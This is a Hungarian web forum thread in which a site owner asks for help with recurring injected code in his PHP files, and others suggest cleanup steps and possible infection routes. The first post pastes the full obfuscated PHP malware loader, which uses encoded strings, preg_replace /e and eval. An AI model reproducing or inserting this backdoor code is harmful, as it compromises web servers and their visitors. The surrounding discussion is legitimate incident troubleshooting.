ugrás a tartalomhoz

SOS Hack - megoldva -> weblap törölve

DaWe35 · 2014. Okt. 23. (Cs), 19.06
Üdv!
Segítségeteket kérem: már sokadjára történik a weblapommal, hogy minden php fájl végére beíródik egy szöveg (lent).
Először is egy olyan linux parancsra lennék kíváncsi, amivek kioperálhatok x szöveget minden php fájl-ból.
Másodszor kérlek segítsetek, mi lehet a hiba oka?
Weboldal http://coolhd.hu és aloldalai. FTP támadás kizárt, a cPanel jelszavam senki sem tudja. CMS-ek és egyebek: 2 friss wordpress, CutePHP, PhpBB, Link exchange script, egy login script, illetve egy-két saját cucc (minecraft szerverek oldal, email küldő űrlap).
Kérlek segítsetek, nem tudok rájönni, hogyan csinálták.
Nagyon köszönöm, DaWe


A szöveg:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $bjnixuhcle = '!dsfbuf%x5c%x7860gvodujpo)##-782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tm5bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x77860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x7855)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%xc%x785c2^-%x5c%x7825hOh%x5c%x%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#np6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>2f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;23]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265c%x7825)euhA)3of>2bd%x5c%%x5c%x7824-!%x5c%x7825%x5tfs%x5c%x7825w6<%x5c%x787fw6*CW#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV24Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#QS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)-1)%x5c%x7825%x5c%x787f!<X>b%x5tfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*8%151%x6d%160%x6c%157%x64%145%x28%x5c%x782f*)323zbe!-#jt0*?]+^?27{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofcSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c25j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x787R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%xx5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3q!Ydrr)%x5c%x7825r%x5c%x787:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x7787f%x5c%x787f<u%x5c%x7825V%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%w%x5c%x7825)ppde>u%x5c%x7825VjR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRkd%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7857%x65","%x65%166%x61%154%x25c%x7825z<jg!)%x5c%x7825z>>72]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]6c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!*5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c2)%x5c%x7825zB%x5c%x7825z>!tussfw)2%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%%x7860LDPT7-UFOJ%x5c%x7860Gx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%2]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x785c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~%x782f#%x5c%x782f#%x5c%x782f},;#5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5x5c%x7825t2w>#]y74]273]y76]252]y85]t%x5c%x7860msvd},;uqpuft%x5cw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%25!>!2p%x5c%x7825!*3>?*928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P51%x29%51%x29%73", NULL); }-%x5c%x7825bT-%x5c%x778]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yyjA)qj3hopmA%x5c%x78273qj%x5c%x78827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hWCw*[!%x5c%x7825rN}#QwTW%x5c%x782>^#zsfvr#%x5c%x785cq%x]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x78w)%x5c%x7825tww**WYsboepn)%x5c%x75]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%d%x5c%x782f#)rrd%x5c%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuf825bss-%x5c%x7825r%x5c%x7878B%x5c%xEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&B)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x57825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x56]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-787f;!|!}{;)gj}l;33bq}k;opjudvr#%x5c%x785cq%x5c%x78257%x5c%x782f7###kukac###7%x5c%x782f7^#iubq#%69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x78x5c%x782f35.)1%x5c%x782e56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%X;%x5c%x7860msvd}R;*msv%x5c%x7825)}*#sfmcnbs+yfeobz+sfwjidsb%x5%x782400~:<h%x5c%x7825_t%x5c%x782x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<5!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y7x5c%x787fw6*%x5c%x787f_*#[k2%x5x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_S%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*25:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x78c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x74-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)x782f#p#%x5c%x782f%x%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x782c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}tj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323l-#}+;%x5c%x7825-qp%x5L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%xc%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x788Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Yppj{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5cXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqn7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdx7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x782jA%x5c%x7827&6<.fmjgA%x5c%x78275c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c25)3of)fepdof%x5c%x786057827&6<*rfs%x5c%x78257-K)fuj%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25256]y6g]257]y86]267]y74]275]y7:]268]y7f#824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x7pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x725!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)u825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)dfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x78c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7827]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]47{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%xy]552]e7y]#>n%x5c%x7825<#372]58y]46#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y3p%x5c%x7825!|!*!***b%x5y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c)ldbqov>*ofmy%x5c%x7<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujo1#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%ovg}%x5c%x7878;0]=])0#)U!%x5c%x7823%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7825)j{hnpd!opjudovg!|!**#8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#;} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%fs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x782s%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rf14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%<!%x5c%x7825tww!>!%x5c8257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5cftbc%x5c%x787f!|!*uyfu%x5c%x782d]252]y74]256]y39]252]y8256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsf7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%xsutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#915c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%%x5c%x782fh%x5c%x7825)n%c%x7825)sf%x5c%x7878p9]271]y83]256]y78]248]y83]256]y81c%x78e%x5c%x78b%x5c%x7825mm)%x5x5c%x7825!<*qp%x5c%x7825-*.%x5825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<197g:74985-rr.93e:5597f-s.973:8297f:5297141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%15c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<bc%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x75j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%7825h>#]y31]278]y3e]81]K78:56985:6if((function_exists("%x6f%142%x5f%163%x74%14mg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]42>!%x5c%x78246767~6<Cw6<pd%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]7c%x7825)!gj}Z;h!opjudovg}{;#)tutc%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)uft#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]Kfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#25%x5c%x7878:!>#]y3g]2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x782c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x782425s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x78-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,25hIr%x5c%x785c1^-%x5c%x7825r%x5my%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x72b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%5:osvufs:~:<*9-1-r%x5c%x,*b%x5c%x7827)fepdof.)fepdof.%x5c%x788223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{x5c%x7824-%x5c%x7824y7%x5c%x782c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%xsbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%xe:56-%x5c%x7878r.985:52985-t.98]K4]65]D%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5x7825o:!>!%x5c%x78242178}527}88:}334}x7825b:>1<!gps)%x5c%x7825j:>1<%xjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvumpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bgi%x5c%x785c1^W%x5c%x7825c!>!%x5c]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tz8]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]3doj%x5c%x78256<%x5c%7k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x7851%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBAL/(.*)/epreg_replaceguwvspinil'; $ltnjtbwnas = explode(chr((283-239)),'8263,44,10037,69,1220,69,7203,57,2152,28,1359,34,8025,49,2548,50,4211,62,8743,21,2294,53,8409,32,7922,63,7076,63,198,54,5855,41,6236,60,8976,64,9225,59,8441,29,6002,27,7303,51,8690,53,129,69,7420,61,2656,27,3930,40,1783,63,3419,32,7536,58,4152,59,796,46,3575,22,5927,50,1714,69,5798,57,5729,69,5896,31,9980,20,4444,42,1056,31,1317,42,4555,55,6861,64,2057,58,7015,61,4668,31,5490,61,5335,48,4348,35,3812,39,2975,28,9615,42,3058,67,8536,32,9726,59,7260,43,560,38,3970,37,6450,69,4486,69,1473,59,9130,31,4889,52,6841,20,3493,49,8307,41,7669,47,6717,24,7632,37,7139,26,5662,67,5551,51,3182,23,9284,68,7892,30,1006,25,667,46,3724,20,627,40,3451,42,9376,37,755,41,842,57,6694,23,2415,46,4383,28,9481,52,2889,51,7807,21,9785,66,4296,52,4699,37,3886,44,8074,64,1289,28,8568,64,5383,39,6413,37,5977,25,7481,31,10000,37,1532,55,2857,32,5422,21,9161,64,2813,44,3205,49,252,52,1872,70,9413,37,2115,37,6296,60,9533,43,1942,35,1422,51,2028,29,9040,59,1657,57,1087,63,6741,38,899,42,6191,45,4123,29,6981,34,6568,34,7716,67,1393,29,9883,38,3003,55,7512,24,941,65,2598,58,2940,35,6089,40,7398,22,4411,33,9352,24,7594,38,453,55,7783,24,6779,62,5213,70,6602,34,2207,45,3597,51,4787,62,9657,37,4610,58,4053,70,1031,25,508,52,8803,61,8929,47,8138,49,6129,62,304,58,3125,57,9450,31,5046,40,3744,68,0,29,5003,43,8470,66,2752,61,1150,70,9851,32,4941,62,1846,26,5602,60,2514,34,4736,51,3542,33,9099,31,598,29,29,54,3648,33,3851,35,8229,34,7985,40,9576,39,7165,38,5106,63,3367,52,3254,65,713,42,8632,58,8764,39,83,46,2252,42,3346,21,6356,57,8348,61,6519,49,9921,59,6925,56,4273,23,7354,44,2683,69,9694,32,4849,40,1587,70,8864,65,1977,51,5283,52,8187,42,5086,20,2180,27,5169,44,4007,46,7861,31,362,48,410,43,5443,47,2461,53,6029,60,6636,58,7828,33,2347,68,3681,43,3319,27'); $fshmghnriq=substr($bjnixuhcle,(65935-55829),(44-37)); if (!function_exists('sjleifewfx')) { function sjleifewfx($hpiwipogci, $vnudkbuamx) { $jevcqkowfl = NULL; for($wrzahlabrf=0;$wrzahlabrf<(sizeof($hpiwipogci)/2);$wrzahlabrf++) { $jevcqkowfl .= substr($vnudkbuamx, $hpiwipogci[($wrzahlabrf*2)],$hpiwipogci[($wrzahlabrf*2)+1]); } return $jevcqkowfl; };} $vwhagrhegr="\x20\57\x2a\40\x65\164\x61\151\x64\142\x67\157\x70\166\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\67\x39\55\x31\64\x32\51\x29\54\x20\143\x68\162\x28\50\x34\67\x30\55\x33\67\x38\51\x29\54\x20\163\x6a\154\x65\151\x66\145\x77\146\x78\50\x24\154\x74\156\x6a\164\x62\167\x6e\141\x73\54\x24\142\x6a\156\x69\170\x75\150\x63\154\x65\51\x29\51\x3b\40\x2f\52\x20\157\x76\156\x62\162\x78\160\x7a\166\x74\40\x2a\57\x20"; $vuirmgfiai=substr($bjnixuhcle,(43599-33486),(50-38)); $vuirmgfiai($fshmghnriq, $vwhagrhegr, NULL); $vuirmgfiai=$vwhagrhegr; $vuirmgfiai=(398-277); $bjnixuhcle=$vuirmgfiai-1; ?>
 
1

Nagyjából azt tanácsolják,

vbence · 2014. Okt. 23. (Cs), 19.19
Nagyjából azt tanácsolják, hogy mentsd le az adatokat, törölj mindent, tegyél fel mindenből friss verziót (amit firssen is tartasz a jövőben), aztán importáld az adatbázist. A második link tartalmaz pár queryt, amivel a módosított posztokat is helyre tudod hozni.

Sok link:
https://wordpress.org/support/topic/i-am-getting-hacked-evry-two-weeks-help-please

Helyreállítás lépései:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
3

Kösz

DaWe35 · 2014. Okt. 23. (Cs), 19.22
Köszönöm a gyors választ. Ezt már többször megcsináltam. Az elsorolt cms-ekről nem terjed valami, hogy vírusos, stb.? Rossz PHP kódot írtam?
5

Ha mindegyiket a

vbence · 2014. Okt. 23. (Cs), 19.35
Ha mindegyiket a legfrissebbre update-elted akkor az nem lehetgond. Ha fény derül támadhatóságra egy opensource cuccban azt viszonylag gyorsan kijavítják.

Fura, hogy fájlok módosulnak, az valószínűleg FTP-n keresztül történik (vagy ha ugyanazzal a userrel futnak a scriptek aki a tulajdonos - ami nem túl jó ötlet). Nincs benne az FTP jelszavad az egyik plugin konfigjában például?

Persze nem kizárt hogy aszerveren lakó egy másik useről teljed át. - De több infó hiányában ez csak spekuláció.
6

Hümmm

DaWe35 · 2014. Okt. 23. (Cs), 19.40
Hmmm. FTP jelszavam nem adtam meg. Nem csak nekem volt ez a probléma, és mások wp pluginra gyanakodnak, vagy wp backdoor. Körülnézek a fájlokban, bár friss wp-nél...
7

File hozzáférés

vbence · 2014. Okt. 23. (Cs), 19.46
Ellenőrizheted, hogy ha FTP-fel feltöltesz egy fájlt, azt tudod-e php kódból módosítani. Ha nem, akkor tuti, hogy FTP-n loopolódik keresztül a dolog.
9

what? XD

DaWe35 · 2014. Okt. 23. (Cs), 20.11
Mit jelent az, hogy PHP kódból módosítani?
11

Mondjuk feltöltesz egy fájlt

vbence · 2014. Okt. 23. (Cs), 22.34
Mondjuk feltöltesz egy fájlt a.html néven amibe csak annyit írsz, hogy HELLO, aztán mellé egy valami.php fájlt, ezzel:
<?php
file_put_contents ("a.html", "WORLD");
Aztán behívod a valami.php-t a böngészőbe, utána meg belenézel a fájlba. Ha "world", akkor lehet módosítani PHPból, ha "hello", akkor csak FTP-n keresztül.
2

Keress kódrészletre

ganyecz · 2014. Okt. 23. (Cs), 19.20
Már így ebben a formában is elég terjedelmes a „sajtója”: link. A megoldás is ott lesz (ahogy gyorsan átböngésztem, igaz, nem ástam bele magam:).

FTP támadás kizárt, a cPanel jelszavam senki sem tudja


Azt te nem tudhatod, régebben (vagy lehet még manapság is) a Total Commander tárolt FTP jelszavait tudták megkaparintani, így sokan abban a tévhitben éltek, hogy mivel senkinek nem adtak jelszót azt senki nem is tudhatja. :) Mindenesetre ilyen esetekben, amikor úgy érzed illetéktelenek mászkálnak a webhelyed gyökerében, legelső lépésként egy jelszócsere a minimum.
4

Köszönöm,

DaWe35 · 2014. Okt. 23. (Cs), 19.23
Már ez is megvolt, nem is egyszer. FTB-be be sem léptem az utóbbi jelszómódosítás után, és az FTP log sem ír semmit.
8

Hopp!

DaWe35 · 2014. Okt. 23. (Cs), 20.05
HOPP!
Egy elavult cPanel... Erre gondoltam én is... A cPanel. Utánajárok. - Frissítés - nem, a szolgáltatóm elutasította a feltételezést...
10

Fertőzött szkript?

DaWe35 · 2014. Okt. 23. (Cs), 21.20
Gyanúm a linxpage pont com-os szkriptre terelődött. Találtam benne sok szép eval() kódot. És a forráskódban benne van: "ezzel a kóddal ne szórakozz, mert különben ő kezd el szórakozni veled. A következményekért nem vállalunk felelősséget." Köztudott ugye, hogy nem egy stabil szkript, többen jelezték már vissza pl, hogy nem érzékeli a weblapkra kitett linket, de van amikor igen. A GooglePR mutató sem megy, stb.
Remélem ez a hiba, mert akkor megvan :-)
12

Neee

DaWe35 · 2014. Okt. 24. (P), 10.54
És nem. Megint meg lettem fertőzve. Bakker.
Az jelent valamit, ha egy francia oldal forráskódjába egy nemlátező oldalam linkje van?
view-source:http://primariabuzau.ro/templates_c/?vuzebkgbiq=0&q=/work/fr/je-cherche-du-travail-aide-a-domicile.php
13

WTF?!?!?

DaWe35 · 2014. Nov. 15. (Szo), 23.32
Letöröltem minden keretrendszert, csak egy wordpress és a saját oldalaim vannak meg! Még mindig nem tudom, mi lehet a hiba! Segítsetek!!!
14

Lehetséges, hogy vírusos a

ecrazor · 2014. Nov. 16. (V), 11.39
Lehetséges, hogy vírusos a géped. Pár évvel ezelőtt nem tudom hogy, de sikerült valamilyen telepítő által felrakni valamilyen vírust ami ezt csinálta (2007 fele, jó rég volt).

Megkereste az FTP hozzáférésemet, és hozzácsatolt a fent lévő fájlokhoz egy plusz kódot, mindig az aljára tette be (főként az index fájlokat piszkálta). Jól megírt volt, mert az FTP logból úgy látszott, hogy én töltöm fel a fájlt, nem pedig külső IP címről.

Víruskereső nem talált semmit. A gép újratelepítése után megoldódott a probléma, FTP jelszavakat kicseréltük, aztán elég gyorsan áttértünk SFTP-re, az unsecure FTP protokollt hátrahagyva és kulcs alapú azonosítást használunk.

Lehetséges hasonló a probléma.
15

Lehetséges

zzrek · 2014. Nov. 16. (V), 21.02
Ezt könnyen leellenőrizheti. Ha közvetlen feltöltés után már fertőzött, akkor elég gyanús.
16

:-(

DaWe35 · 2014. Nov. 24. (H), 19.50
Letöröltem szinte minden weboldalt, csak a 100%-ban sajátokat állítottam vissza (wordpress, stb delete). Egyelőre várok, de tisztának tűnk a helyzet...